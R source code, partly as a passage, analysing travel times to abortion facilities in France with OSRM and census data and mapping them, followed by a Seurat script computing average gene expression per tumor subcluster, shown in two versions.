setnames(ivg_ccam,c("ccam","nb_actes"),c("ccam.img2","nb_actes.img2"))
## Delivery procedure subsets (CCAM delivery codes)
## JQGD001, JQGD002, JQGD003, JQGD004, JQGD005, JQGD007, JQGD008, JQGD012, JQGD013, JQGA002, JQGA003, JQGA004, JQGA005, JQGD010
ivg_acc<-subset(ccam,ccam %in% c("JQGD0010","JQGD0020","JQGD0030","JQGD0040","JQGD0050","JQGD0070","JQGD0080","JQGD0120","JQGD0130","JQGA0020","JQGA0030","JQGA0040","JQGA0050","JQGD0100"))
ivg_acc<-aggregate(ivg_acc$nb_actes,list(ivg_acc$finess_geo),sum,na.rm=TRUE)
colnames(ivg_acc)<-c("finess_geo","nb_actes.acc")
# NOTE(review): inner join — facilities with abortion procedures but zero
# deliveries are silently dropped here; confirm that this is intended.
ivg_ccam<-merge(ivg_ccam,ivg_acc,by.x="finess_geo",by.y="finess_geo")
## Attach the year
ivg_ccam["annee"]<-paste("20",year,sep="")
ivg_ccam<-subset(ivg_ccam,select=-c(ccam.c,ccam.m,ccam.img2))
return(ivg_ccam)
}
# Stack the four available Open-CCAM years into one table
ivg_ccam<-purrr::map_df(c("15","16","17","18"),read_ivgCCAM)
# Total abortions = surgical (aspiration/curettage) + medication method
ivg_ccam$nb_actes<-rowSums(ivg_ccam[,c("nb_actes.c","nb_actes.m")],na.rm=TRUE)
# Attach facility metadata and department/region labels
ivg_ccam<-merge(ivg_ccam,finess_geo,by.x="finess_geo",by.y="nofinesset",all.x=TRUE)
dpt_reg<-read.csv("files/departement2019.csv",sep=",",col.names=c("dep","reg","cheflieu","tncc","ncc","nccenr","libelle"))
ivg_ccam<-merge(ivg_ccam,dpt_reg,by.x=c("dep","reg"),by.y=c("dep","reg"),all.x=TRUE)
# Commune/region shapefiles, one layer per territory
in.dir<- ("geo")
## METROPOLITAN FRANCE
france_1<-readOGR(in.dir,layer="COMMUNE_1",verbose=FALSE)
france_r<-readOGR(in.dir,layer="REGION_1",verbose=FALSE)
## MAYOTTE
france_2<-readOGR(in.dir,layer="COMMUNE_2",verbose=FALSE)
## LA REUNION
france_3<-readOGR(in.dir,layer="COMMUNE_3",verbose=FALSE)
## GUADELOUPE
france_4<-readOGR(in.dir,layer="COMMUNE_4",verbose=FALSE)
## MARTINIQUE
france_5<-readOGR(in.dir,layer="COMMUNE_5",verbose=FALSE)
## GUYANE (French Guiana)
france_6<-readOGR(in.dir,layer="COMMUNE_6",verbose=FALSE)
### Preparation of the facility subsets used for the travel-time maps:
### facilities that offered surgical abortions during the year (2013, 2014, 2018)
### and facilities that performed late (12-14 week) abortions in 2018
ivg_geo_2013<-subset(ivg,AN==2013 & IVG-IVGME > 0)
ivg_geo_2014<-subset(ivg,AN==2014 & IVG-IVGME > 0)
ivg_geo_2018<-subset(ivg,AN==2018 & IVG-IVGME > 0)
ivg1214_geo_2018<-subset(ivg,AN==2018 & IVG1214 > 0)
## Travel time computation (requires a local OSRM server)
## Build the routing graph: osrm-extract france-latest.osm.pbf -p ~/Sites/dev/osrm-backend/profiles/car.lua
## Start the server: osrm-routed france-latest.osrm
## Compute, for every commune of a region, the driving time (minutes) to the
## nearest facility performing surgical abortions, for 2013 / 2014 / 2018, and
## for 2018 the time to the nearest facility performing late (12-14 week)
## abortions. Relies on globals: france_1..france_6 (commune shapefiles), the
## ivg_geo_* / ivg1214_geo_2018 facility subsets, and a running local OSRM
## server (see the setup comments just above this function).
## Returns a data frame: code, d2013, d2014, d2018, d1214, diff, diff1214.
fetchDurees<-function(region) {
  # Region -> (printed label, commune shapefile, FINESS department code).
  # deps = NULL means metropolitan France, i.e. everything but the overseas codes.
  cfg <- switch(region,
    "Mayotte"    = list(label = "Mayotte",    shp = france_2, deps = "9F"),
    "Guadeloupe" = list(label = "Guadeloupe", shp = france_4, deps = "9A"),
    "Martinique" = list(label = "Martinique", shp = france_5, deps = "9B"),
    "Reunion"    = list(label = "La Réunion", shp = france_3, deps = "9D"),
    "Guyane"     = list(label = "Guyane",     shp = france_6, deps = "9C"),
    "Metropole"  = list(label = "Métropole",  shp = france_1, deps = NULL),
    stop("Unknown region: ", region)
  )
  print(cfg$label)
  # Commune centroids reprojected to WGS84, as expected by osrmTable()
  df <- data.frame(as.character(cfg$shp$INSEE_COM),
                   coordinates(spTransform(cfg$shp, CRSobj = "+init=epsg:4326")))
  colnames(df) <- c("id", "x", "y")
  # Keep only the facilities located in the region of interest
  dom_codes <- c("9A", "9B", "9C", "9D", "9F")
  pick_local <- function(etabs) {
    if (is.null(cfg$deps)) subset(etabs, !departement %in% dom_codes)
    else subset(etabs, departement %in% cfg$deps)
  }
  # One duration column per facility subset (was four copy-pasted loop bodies)
  targets <- list(
    d2013 = list(tag = "2013",          etabs = pick_local(ivg_geo_2013)),
    d2014 = list(tag = "2014",          etabs = pick_local(ivg_geo_2014)),
    d2018 = list(tag = "2018",          etabs = pick_local(ivg_geo_2018)),
    d1214 = list(tag = "2018 (12-14)",  etabs = pick_local(ivg1214_geo_2018))
  )
  n <- nrow(df)
  duree <- data.frame(code = as.character(df$id), stringsAsFactors = FALSE)
  for (col in names(targets)) {
    tgt <- targets[[col]]
    mins <- rep(NA_real_, n)
    for (i in seq_len(n)) {
      print(paste("Analysing for ", tgt$tag, " : ", df[i, 1], " (", n - i, " to go)", sep = ""))
      # One travel-time row from this commune to every facility; keep the minimum.
      # BUG FIX: osrmTable() itself was outside the tryCatch, so a single
      # unroutable point or server hiccup crashed the whole run; it is now
      # recorded as NA like any other failure.
      mins[i] <- tryCatch({
        dist <- osrmTable(src = df[i, c("id", "x", "y")],
                          dst = tgt$etabs[, c("FI", "lon", "lat")])
        as.numeric(apply(dist$durations, 1, min))
      }, error = function(e) {
        NA
      })
    }
    duree[[col]] <- mins
  }
  # Change in access time 2013 -> 2018, and the extra time needed to reach a
  # facility performing 12-14 week abortions compared to any surgical provider
  duree$diff <- duree$d2018 - duree$d2013
  duree$diff1214 <- duree$d1214 - duree$d2018
  return(duree)
}
# Metropolitan France
duree_me<-fetchDurees("Metropole")
# Mayotte
duree_ma<-fetchDurees("Mayotte")
# La Réunion
duree_lr<-fetchDurees("Reunion")
# Guadeloupe
duree_ga<-fetchDurees("Guadeloupe")
# Martinique
duree_mt<-fetchDurees("Martinique")
# French Guiana
duree_gy<-fetchDurees("Guyane")
duree<-rbind(duree_me,duree_ma,duree_lr,duree_ga,duree_mt,duree_gy)
#duree<-rbind(duree_ma,duree_lr,duree_ga,duree_mt,duree_gy)
## Cross with the population census (2016, except Mayotte: 2012)
pop2016<-read.csv("files/BTX_TD_POP1B_2016.csv",sep=";")
pop2016_ma<-read.csv("files/BTX_TD_POP1B_2012.csv",sep=";")
pop2016<-rbind.fill(pop2016,pop2016_ma)
# Census age columns — presumably women (SEXE2) aged 15-50 for F_AP and the
# narrower 20-35 band for F_AP2; confirm against the INSEE variable dictionary.
colfap<-c("SEXE2_AGED100015","SEXE2_AGED100016","SEXE2_AGED100017","SEXE2_AGED100018","SEXE2_AGED100019","SEXE2_AGED100020","SEXE2_AGED100021","SEXE2_AGED100022","SEXE2_AGED100023","SEXE2_AGED100024","SEXE2_AGED100025","SEXE2_AGED100026","SEXE2_AGED100027","SEXE2_AGED100028","SEXE2_AGED100029","SEXE2_AGED100030","SEXE2_AGED100031","SEXE2_AGED100032","SEXE2_AGED100033","SEXE2_AGED100034","SEXE2_AGED100035","SEXE2_AGED100036","SEXE2_AGED100037","SEXE2_AGED100038","SEXE2_AGED100039","SEXE2_AGED100040","SEXE2_AGED100041","SEXE2_AGED100042","SEXE2_AGED100043","SEXE2_AGED100044","SEXE2_AGED100045","SEXE2_AGED100046","SEXE2_AGED100047","SEXE2_AGED100048","SEXE2_AGED100049","SEXE2_AGED100050")
colfap_2<-c("SEXE2_AGED100020","SEXE2_AGED100021","SEXE2_AGED100022","SEXE2_AGED100023","SEXE2_AGED100024","SEXE2_AGED100025","SEXE2_AGED100026","SEXE2_AGED100027","SEXE2_AGED100028","SEXE2_AGED100029","SEXE2_AGED100030","SEXE2_AGED100031","SEXE2_AGED100032","SEXE2_AGED100033","SEXE2_AGED100034","SEXE2_AGED100035")
pop2016$F_AP<-rowSums(pop2016[,colfap])
pop2016$F_AP2<-rowSums(pop2016[,colfap_2])
duree<-merge(duree,pop2016,by.x="code",by.y="CODGEO",all.x=TRUE)
write.csv(duree[,c("code","d2013","d2014","d2018","d1214","diff","diff1214","LIBGEO","F_AP","F_AP2")],"duree_ivg.csv",row.names=FALSE)
#duree<-read.csv("duree_ivg.csv",sep=",")
## FRANCE: women of childbearing age per access-time band (minutes)
tapply(duree$F_AP,cut(duree$d2018,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)
tapply(duree$F_AP,cut(duree$d1214,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)
tapply(duree$F_AP,cut(duree$diff,breaks=c(-60,-45,-30,-15,0,15,30,45,60),labels=c("-60m-45m","-45m-30m","-30m-15m","-15m0m","0m+15m","+15m+30m","+30m+45m","+45m+60m")),FUN=sum,na.rm=TRUE)
## Loiret (department 45)
tapply(subset(duree,startsWith(duree$code,"45"))$F_AP,cut(subset(duree,startsWith(duree$code,"45"))$d2013,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)
tapply(subset(duree,startsWith(duree$code,"45"))$F_AP,cut(subset(duree,startsWith(duree$code,"45"))$d2018,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)
tapply(subset(duree,startsWith(duree$code,"45"))$F_AP,cut(subset(duree,startsWith(duree$code,"45"))$diff,breaks=c(-60,-45,-30,-15,0,15,30,45,60),labels=c("-60m-45m","-45m-30m","-30m-15m","-15m0m","0m+15m","+15m+30m","+30m+45m","+45m+60m")),FUN=sum,na.rm=TRUE)
###### population-weighted mean travel time in the Loiret:
##### per-commune travel time * per-commune population / total population
sum(duree$d2018[startsWith(duree$code,"45")]*duree$F_AP[startsWith(duree$code,"45")])/sum(duree$F_AP[startsWith(duree$code,"45")])
## Loire-Atlantique (department 44)
tapply(subset(duree,startsWith(duree$code,"44"))$F_AP,cut(subset(duree,startsWith(duree$code,"44"))$d2013,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)
tapply(subset(duree,startsWith(duree$code,"44"))$F_AP,cut(subset(duree,startsWith(duree$code,"44"))$d2018,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)
tapply(subset(duree,startsWith(duree$code,"44"))$F_AP,cut(subset(duree,startsWith(duree$code,"44"))$diff,breaks=c(-60,-45,-30,-15,0,15,30,45,60),labels=c("-60m-45m","-45m-30m","-30m-15m","-15m0m","0m+15m","+15m+30m","+30m+45m","+45m+60m")),FUN=sum,na.rm=TRUE)
###### population-weighted mean travel time in Loire-Atlantique:
##### per-commune travel time * per-commune population / total population
sum(duree$d2018[startsWith(duree$code,"44")]*duree$F_AP[startsWith(duree$code,"44")])/sum(duree$F_AP[startsWith(duree$code,"44")])
## Pays-de-la-Loire: per-department access-time bands and weighted means
sapply(c("44","49","53","72","85"),function(x){tapply(subset(duree,startsWith(duree$code,x))$F_AP,cut(subset(duree,startsWith(duree$code,x))$d2018,breaks=c(0,30,45,500),labels=c("0-30","30-45","+45")),FUN=sum,na.rm=TRUE)})
sapply(c("44","49","53","72","85"),function(x){sum(duree$d2018[startsWith(duree$code,x)]*duree$F_AP[startsWith(duree$code,x)],na.rm=TRUE)/sum(duree$F_AP[startsWith(duree$code,x)],na.rm=TRUE)})
## Map rendering: export the yearly facility subsets and promote the plotted
## ones to spatial objects
write.csv(ivg_geo_2013,"ivg2013.csv")
# BUG FIX: ivg_geo_2017 was exported but never created (only the 2013/2014/2018
# subsets exist above), so this write.csv crashed. Build it the same way.
ivg_geo_2017<-subset(ivg,AN==2017 & IVG-IVGME > 0)
write.csv(ivg_geo_2017,"ivg2017.csv")
write.csv(ivg_geo_2018,"ivg2018.csv")
# Turn the 2013/2018 data frames into SpatialPointsDataFrames (WGS84) for plotting
coordinates(ivg_geo_2013)<- ~lon+lat
proj4string(ivg_geo_2013)<-CRS("+proj=longlat +datum=WGS84")
coordinates(ivg_geo_2018)<- ~lon+lat
proj4string(ivg_geo_2018)<-CRS("+proj=longlat +datum=WGS84")
## Choropleth of driving time to the nearest surgical-abortion facility for one
## metropolitan region, saved as cartes/<region>_<year>.pdf.
## Only "2013" and "2018" are supported (columns d2013 / d2018 of 'duree').
drawRegion<-function(nom_reg,annee){
  par(bg="#006994")
  region<-france_1[france_1$NOM_REG==nom_reg,]
  # Facility points must share the CRS of the region layer before plotting
  ivg_geo_2013<-spTransform(ivg_geo_2013,CRS(proj4string(france_r)))
  ivg_geo_2018<-spTransform(ivg_geo_2018,CRS(proj4string(france_r)))
  poi<-subset(region,STATUT=="Capitale d'état" | STATUT=="Préfecture" | STATUT=="Préfecture de région" | STATUT=="Sous-préfecture")
  plot(france_r,col="#DDDDDD",border=1,xlim=bbox(region)[1,],ylim=bbox(region)[2,])
  if(annee=="2013") {
    choroLayer(spdf=region,spdfid="INSEE_COM",df=duree,dfid="code",var="d2013",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
    points(ivg_geo_2013,pch=15,cex=0.5,col="red")
  }
  else if(annee=="2018") {
    # BUG FIX: var was "d2017", a column that does not exist in 'duree'
    # (fetchDurees produces d2013/d2014/d2018/d1214 only)
    choroLayer(spdf=region,spdfid="INSEE_COM",df=duree,dfid="code",var="d2018",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
    points(ivg_geo_2018,pch=15,cex=0.5,col="red")
  }
  else {
    # Previously silently skipped; keep drawing the base map but warn
    warning("drawRegion: unsupported year '",annee,"' — map drawn without a choropleth layer")
  }
  points(coordinates(poi),pch=20,cex=0.5,col="white")
  labelLayer(poi,poi@data,spdfid="INSEE_COM",dfid="INSEE_COM",txt="NOM_COM",cex=0.4,pos=2,font=4,offset=0.2,col= "#000000", bg = "#FFFFFF50",halo=TRUE,overlap=FALSE)
  layoutLayer(title = paste(nom_reg,annee),coltitle="black",col=NA,sources="",scale = NULL,author=NULL,frame=FALSE)
  dev.print(pdf,paste('cartes/',nom_reg,'_',annee,'.pdf',sep=""))
}
## Choropleth of driving time (2018) to the nearest surgical-abortion facility
## in Mayotte, saved as cartes/MAYOTTE.pdf.
drawRegionMayotte<-function(){
  par(bg="#006994")
  region<-france_2
  ivg_geo<-spTransform(ivg_geo_2018,CRS(proj4string(region)))
  poi<-subset(region,STATUT=="Capitale d'état" | STATUT=="Préfecture" | STATUT=="Préfecture de région" | STATUT=="Sous-préfecture")
  plot(region,col="#DDDDDD",border=1,xlim=bbox(region)[1,],ylim=bbox(region)[2,])
  # BUG FIX: fetchDurees() returns columns code/d2013/d2014/d2018/d1214 —
  # dfid="id" / var="val.x" referred to a previous version of the duration table
  choroLayer(spdf=region,spdfid="INSEE_COM",df=duree_ma,dfid="code",var="d2018",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
  points(ivg_geo,pch=15,cex=0.5,col="red")
  points(coordinates(poi),pch=20,cex=0.5,col="white")
  labelLayer(spdf=poi,df=poi@data,spdfid="INSEE_COM",dfid="INSEE_COM",txt="NOM_COM",cex=0.4,pos=2,font=4,offset=0.2,col= "#000000", bg = "#FFFFFF50",halo=TRUE,overlap=TRUE)
  layoutLayer(title = paste("ACCÈS À L'IVG À MAYOTTE"),coltitle="black",col=NA,sources="",scale = NULL,author=NULL,frame=FALSE)
  dev.print(pdf,'cartes/MAYOTTE.pdf')
}
## Choropleth of driving time (2018) to the nearest surgical-abortion facility
## in La Réunion, saved as cartes/REUNION.pdf.
drawRegionReunion<-function(){
  par(bg="#006994")
  region<-france_3
  ivg_geo<-spTransform(ivg_geo_2018,CRS(proj4string(region)))
  poi<-subset(region,STATUT=="Capitale d'état" | STATUT=="Préfecture" | STATUT=="Préfecture de région" | STATUT=="Sous-préfecture")
  plot(region,col="#DDDDDD",border=1,xlim=bbox(region)[1,],ylim=bbox(region)[2,])
  # BUG FIX: fetchDurees() returns columns code/d2013/d2014/d2018/d1214 —
  # dfid="id" / var="val.x" referred to a previous version of the duration table
  choroLayer(spdf=region,spdfid="INSEE_COM",df=duree_lr,dfid="code",var="d2018",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
  points(ivg_geo,pch=15,cex=0.5,col="red")
  points(coordinates(poi),pch=20,cex=0.5,col="white")
  labelLayer(spdf=poi,df=poi@data,spdfid="INSEE_COM",dfid="INSEE_COM",txt="NOM_COM",cex=0.4,pos=2,font=4,offset=0.2,col= "#000000", bg = "#FFFFFF50",halo=TRUE,overlap=FALSE)
  layoutLayer(title = paste("ACCÈS À L'IVG À LA RÉUNION"),coltitle="black",col=NA,sources="",scale = NULL,author=NULL,frame=FALSE)
  dev.print(pdf,'cartes/REUNION.pdf')
}
## Choropleth of driving time (2018) to the nearest surgical-abortion facility
## in Guadeloupe, saved as cartes/GUADELOUPE.pdf.
drawRegionGuadeloupe<-function(){
  par(bg="#006994")
  region<-france_4
  ivg_geo<-spTransform(ivg_geo_2018,CRS(proj4string(region)))
  poi<-subset(region,STATUT=="Capitale d'état" | STATUT=="Préfecture" | STATUT=="Préfecture de région" | STATUT=="Sous-préfecture")
  plot(region,col="#DDDDDD",border=1,xlim=bbox(region)[1,],ylim=bbox(region)[2,])
  # BUG FIX: was df=duree with dfid="id" / var="val.x", columns that do not
  # exist (fetchDurees returns code/d2013/d2014/d2018/d1214); use the
  # region-specific table like the other overseas maps
  choroLayer(spdf=region,spdfid="INSEE_COM",df=duree_ga,dfid="code",var="d2018",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
  points(ivg_geo,pch=15,cex=0.5,col="red")
  points(coordinates(poi),pch=20,cex=0.5,col="white")
  labelLayer(spdf=poi,df=poi@data,spdfid="INSEE_COM",dfid="INSEE_COM",txt="NOM_COM",cex=0.4,pos=2,font=4,offset=0.2,col= "#000000", bg = "#FFFFFF50",halo=TRUE,overlap=FALSE)
  layoutLayer(title = paste("ACCÈS À L'IVG EN GUADELOUPE"),coltitle="black",col=NA,sources="",scale = NULL,author=NULL,frame=FALSE)
  dev.print(pdf,'cartes/GUADELOUPE.pdf')
}
## Choropleth of driving time (2018) to the nearest surgical-abortion facility
## in Martinique, saved as cartes/MARTINIQUE.pdf.
drawRegionMartinique<-function(){
  par(bg="#006994")
  region<-france_5
  ivg_geo<-spTransform(ivg_geo_2018,CRS(proj4string(region)))
  poi<-subset(region,STATUT=="Capitale d'état" | STATUT=="Préfecture" | STATUT=="Préfecture de région" | STATUT=="Sous-préfecture")
  plot(region,col="#DDDDDD",border=1,xlim=bbox(region)[1,],ylim=bbox(region)[2,])
  # BUG FIX: was df=duree with dfid="id" / var="val", columns that do not exist
  # (fetchDurees returns code/d2013/d2014/d2018/d1214); use the region table
  choroLayer(spdf=region,spdfid="INSEE_COM",df=duree_mt,dfid="code",var="d2018",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
  points(ivg_geo,pch=15,cex=0.5,col="red")
  points(coordinates(poi),pch=20,cex=0.5,col="white")
  labelLayer(spdf=poi,df=poi@data,spdfid="INSEE_COM",dfid="INSEE_COM",txt="NOM_COM",cex=0.4,pos=2,font=4,offset=0.2,col= "#000000", bg = "#FFFFFF50",halo=TRUE,overlap=FALSE)
  layoutLayer(title = paste("ACCÈS À L'IVG EN MARTINIQUE"),coltitle="black",col=NA,sources="",scale = NULL,author=NULL,frame=FALSE)
  dev.print(pdf,'cartes/MARTINIQUE.pdf')
}
## Choropleth of driving time (2018) to the nearest surgical-abortion facility
## in French Guiana, saved as cartes/GUYANE.pdf.
drawRegionGuyane<-function(){
  par(bg="#006994")
  region<-france_6
  ivg_geo<-spTransform(ivg_geo_2018,CRS(proj4string(region)))
  poi<-subset(region,STATUT=="Capitale d'état" | STATUT=="Préfecture" | STATUT=="Préfecture de région" | STATUT=="Sous-préfecture")
  plot(region,col="#DDDDDD",border=1,xlim=bbox(region)[1,],ylim=bbox(region)[2,])
  # BUG FIX: was df=duree with dfid="id" / var="val", columns that do not exist
  # (fetchDurees returns code/d2013/d2014/d2018/d1214); use the region table
  choroLayer(spdf=region,spdfid="INSEE_COM",df=duree_gy,dfid="code",var="d2018",nclass=7,lwd=0.0001,breaks=c(0,15,30,45,60,75,90,500),col=carto.pal("wine.pal",8),add=TRUE)
  points(ivg_geo,pch=15,cex=0.5,col="red")
  points(coordinates(poi),pch=20,cex=0.5,col="white")
  labelLayer(spdf=poi,df=poi@data,spdfid="INSEE_COM",dfid="INSEE_COM",txt="NOM_COM",cex=0.4,pos=2,font=4,offset=0.2,col= "#000000", bg = "#FFFFFF50",halo=TRUE,overlap=FALSE)
  layoutLayer(title = paste("ACCÈS À L'IVG EN GUYANE"),coltitle="black",col=NA,sources="",scale = NULL,author=NULL,frame=FALSE)
  dev.print(pdf,'cartes/GUYANE.pdf')
}
## Render every map: one per overseas territory, then every metropolitan
## region for the year 2018.
drawRegions<-function() {
  # Each overseas territory has its own dedicated drawing routine
  overseas_draws <- list(drawRegionMayotte, drawRegionReunion,
                         drawRegionGuadeloupe, drawRegionMartinique,
                         drawRegionGuyane)
  for (draw_dom in overseas_draws) {
    draw_dom()
  }
  # Metropolitan regions all go through the generic drawRegion()
  regions_metro <- c("AUVERGNE-RHONE-ALPES","BOURGOGNE-FRANCHE-COMTE","BRETAGNE",
                     "CENTRE-VAL DE LOIRE","CORSE","GRAND EST","HAUTS-DE-FRANCE",
                     "ILE-DE-FRANCE","NORMANDIE","NOUVELLE-AQUITAINE","OCCITANIE",
                     "PAYS DE LA LOIRE","PROVENCE-ALPES-COTE D'AZUR")
  for (nom_region in regions_metro) {
    drawRegion(nom_region, "2018")
  }
}
# Render every map, then two extra Centre-Val de Loire maps
drawRegions()
drawRegion("CENTRE-VAL DE LOIRE","2013")
# NOTE(review): drawRegion() only implements the "2013" and "2018" branches and
# 'duree' has no d2017 column, so this call produces a map without a
# choropleth layer — confirm whether "2018" (or a d2017 column) was intended.
drawRegion("CENTRE-VAL DE LOIRE","2017")
## Regional exports: dump the SAE and ScanSanté (Open-CCAM) rows for a set of
## departments into two CSV files.
## `liste`: vector of FINESS department codes; `nom`: suffix for the filenames.
extractRegion<- function(liste,nom) {
## SAE extraction
ivg_local<-subset(ivg,departement %in% liste)
# NOTE(review): earlier in this script the staffing columns of 'ivg' are renamed
# to EFFPL_IVG/EFFPA_IVG/ETP_IVG (and *_GY), so selecting "EFFPL"/"EFFPA"/"ETP"
# here looks stale and would fail; "CONV" is not visibly created either —
# confirm against the live data before running.
ivg_local<-ivg_local[,c("AN","rs","departement","libcategetab","IVG","IVGME","CONV","EFFPL","EFFPA","ETP","siret","nofinessej")]
colnames(ivg_local)<-c("Année","Nom","Département","Type d'établissement","Nombre d'IVG","Nombre d'IVG médicamenteuses","Conventions","Temps plein","Temps partiel","ETP moyens","Siret","Finess")
filename=paste("exports/sae_",nom,".csv",sep="")
write.csv(ivg_local,file=filename,row.names=FALSE)
## CCAM (ScanSanté) extraction
ivg_local_ccam<-subset(ivg_ccam,departement %in% liste)
# NOTE(review): read_ivgCCAM() drops the ccam.* columns and produces
# nb_actes.c/.m/.img2/.acc plus a summed nb_actes — a single "ccam" column no
# longer exists in 'ivg_ccam'; this selection also looks stale — confirm.
ivg_local_ccam<-ivg_local_ccam[,c("annee","rs","departement","libcategetab","ccam","nb_actes","siret","nofinessej")]
colnames(ivg_local_ccam)<-c("Année","Nom","Département","Type d'établissement","Type d'IVG","Nombre d'IVG","Siret","Finess")
filename_ccam=paste("exports/scansante_",nom,".csv",sep="")
write.csv(ivg_local_ccam,file=filename_ccam,row.names=FALSE)
# Quick sanity check: facility counts found in each source
print(paste(length(table(ivg_local$Nom))," établissements dans le SAE et ",length(table(ivg_local_ccam$Nom))," dans ScanSanté",sep=""))
}
|
#!/usr/bin/env Rscript
## Compute per-tumor-subcluster average expression from a Seurat object.
## Usage: Rscript averageexpression_tumor_cells_by_seurat_subcluster.R \
##   <output_dir> <output_filename> <path_to_seurat_rds> <barcode2subcluster_table>

## Libraries
packages <- c(
  "ggplot2",
  "Seurat",
  "dplyr",
  "plyr",
  "data.table"
)
for (pkg_name_tmp in packages) {
  # Report availability, then attach; library() still errors if truly missing
  if (!(pkg_name_tmp %in% installed.packages()[, 1])) {
    print(paste0("No ", pkg_name_tmp, " Installed!"))
  } else {
    print(paste0("", pkg_name_tmp, " Installed!"))
  }
  library(package = pkg_name_tmp, character.only = TRUE, quietly = TRUE)
}
cat("Finish loading libraries!\n")
cat("###########################################\n")
## Command-line arguments
args <- commandArgs(trailingOnly = TRUE)
# Fail fast with a clear message instead of an obscure subscript error below
if (length(args) < 4) {
  stop("Expected 4 arguments: <output_dir> <output_filename> <seurat_rds> <barcode2subcluster_table>", call. = FALSE)
}
## argument 1: directory for the output
path_output_dir <- args[1]
cat(paste0("Path to the output directory: ", path_output_dir, "\n"))
cat("###########################################\n")
## argument 2: filename for the output file
path_output_filename <- args[2]
cat(paste0("Filename for the output: ", path_output_filename, "\n"))
cat("###########################################\n")
path_output <- paste0(path_output_dir, path_output_filename)
## argument 3: path to the seurat object
path_srat <- args[3]
cat(paste0("Path to the seurat object: ", path_srat, "\n"))
cat("###########################################\n")
## argument 4: path to the barcode-to-tumorsubcluster table
path_barcode2tumorsubcluster_df <- args[4]
cat(paste0("Path to the barcode-to-tumorsubcluster table: ", path_barcode2tumorsubcluster_df, "\n"))
cat("###########################################\n")
## Read the barcode-to-tumorsubcluster table
barcode2tumorsubcluster_df <- fread(input = path_barcode2tumorsubcluster_df, data.table = F)
barcode2tumorsubcluster_df <- as.data.frame(barcode2tumorsubcluster_df)
cat("finish reading the barcode-to-tumorsubcluster table!\n")
cat("###########################################\n")
## Read the seurat object
cat(paste0("Start reading the seurat object: ", "\n"))
srat <- readRDS(path_srat)
# BUG FIX: was print("...\n"), which emits [1] "...\n" with a literal backslash-n;
# cat() is used everywhere else in this script.
cat("Finish reading the seurat object!\n")
cat("###########################################\n")
## Attach subcluster assignments to the metadata.
## NOTE(review): this replaces srat@meta.data wholesale — the new table's
## rownames must cover exactly the cells of the object; confirm upstream.
metadata_tmp <- barcode2tumorsubcluster_df
metadata_tmp$tumor_exp_subcluster.name <- paste0(metadata_tmp$orig.ident, "_EC", metadata_tmp$tumor_exp_subcluster.ident)
rownames(metadata_tmp) <- metadata_tmp$integrated_barcode
srat@meta.data <- metadata_tmp
## Identify cells by their tumor subcluster name
Idents(srat) <- "tumor_exp_subcluster.name"
## Average expression per subcluster
aliquot.averages <- AverageExpression(srat)
# BUG FIX: same print -> cat fix as above
cat("Finish running AverageExpression!\n")
cat("###########################################\n")
## Write output (tab-separated, genes as row names)
write.table(aliquot.averages, file = path_output, quote = FALSE, sep = "\t", row.names = TRUE)
cat("Finished saving the output\n")
cat("###########################################\n")
| /integration/30_aliquot_integration/averageexpression/averageexpression_tumor_cells_by_seurat_subcluster.R | no_license | ding-lab/ccRCC_snRNA_analysis | R | false | false | 2,698 | r | #!/usr/bin/env Rscript
## Compute per-tumor-subcluster average expression from a Seurat object.
## Usage: Rscript <script> <output_dir> <output_filename> <seurat_rds> <barcode2subcluster_table>
## library
packages = c(
"ggplot2",
"Seurat",
"dplyr",
"plyr",
"data.table"
)
# Report availability of each package, then attach it (library() errors if missing)
for (pkg_name_tmp in packages) {
if (!(pkg_name_tmp %in% installed.packages()[,1])) {
print(paste0("No ", pkg_name_tmp, " Installed!"))
} else {
print(paste0("", pkg_name_tmp, " Installed!"))
}
library(package = pkg_name_tmp, character.only = T, quietly = T)
}
cat("Finish loading libraries!\n")
cat("###########################################\n")
## get the path to the seurat object
args = commandArgs(trailingOnly=TRUE)
## argument: directory to the output
path_output_dir <- args[1]
cat(paste0("Path to the output directory: ", path_output_dir, "\n"))
cat("###########################################\n")
## argument 2: filename for the output file
path_output_filename <- args[2]
cat(paste0("Filename for the output: ", path_output_filename, "\n"))
cat("###########################################\n")
path_output <- paste0(path_output_dir, path_output_filename)
## argument : path to seurat object
path_srat <- args[3]
cat(paste0("Path to the seurat object: ", path_srat, "\n"))
cat("###########################################\n")
## argument: path to the barcode-to-tumorsubcluster table
path_barcode2tumorsubcluster_df <- args[4]
cat(paste0("Path to the barcode-to-tumorsubcluster table: ", path_barcode2tumorsubcluster_df, "\n"))
cat("###########################################\n")
## input the barcode-to-tumorsubcluster table
barcode2tumorsubcluster_df <- fread(input = path_barcode2tumorsubcluster_df, data.table = F)
barcode2tumorsubcluster_df <- as.data.frame(barcode2tumorsubcluster_df)
cat("finish reading the barcode-to-tumorsubcluster table!\n")
cat("###########################################\n")
## input srat
cat(paste0("Start reading the seurat object: ", "\n"))
srat <- readRDS(path_srat)
# NOTE(review): print() here emits [1] "...\n" with a literal backslash-n;
# cat() would match the rest of the script.
print("Finish reading the seurat object!\n")
cat("###########################################\n")
## add info to the meta data
## NOTE(review): this replaces srat@meta.data wholesale — the new table's
## rownames must cover exactly the cells of the object; confirm upstream.
metadata_tmp <- barcode2tumorsubcluster_df
metadata_tmp$tumor_exp_subcluster.name <- paste0(metadata_tmp$orig.ident, "_EC", metadata_tmp$tumor_exp_subcluster.ident)
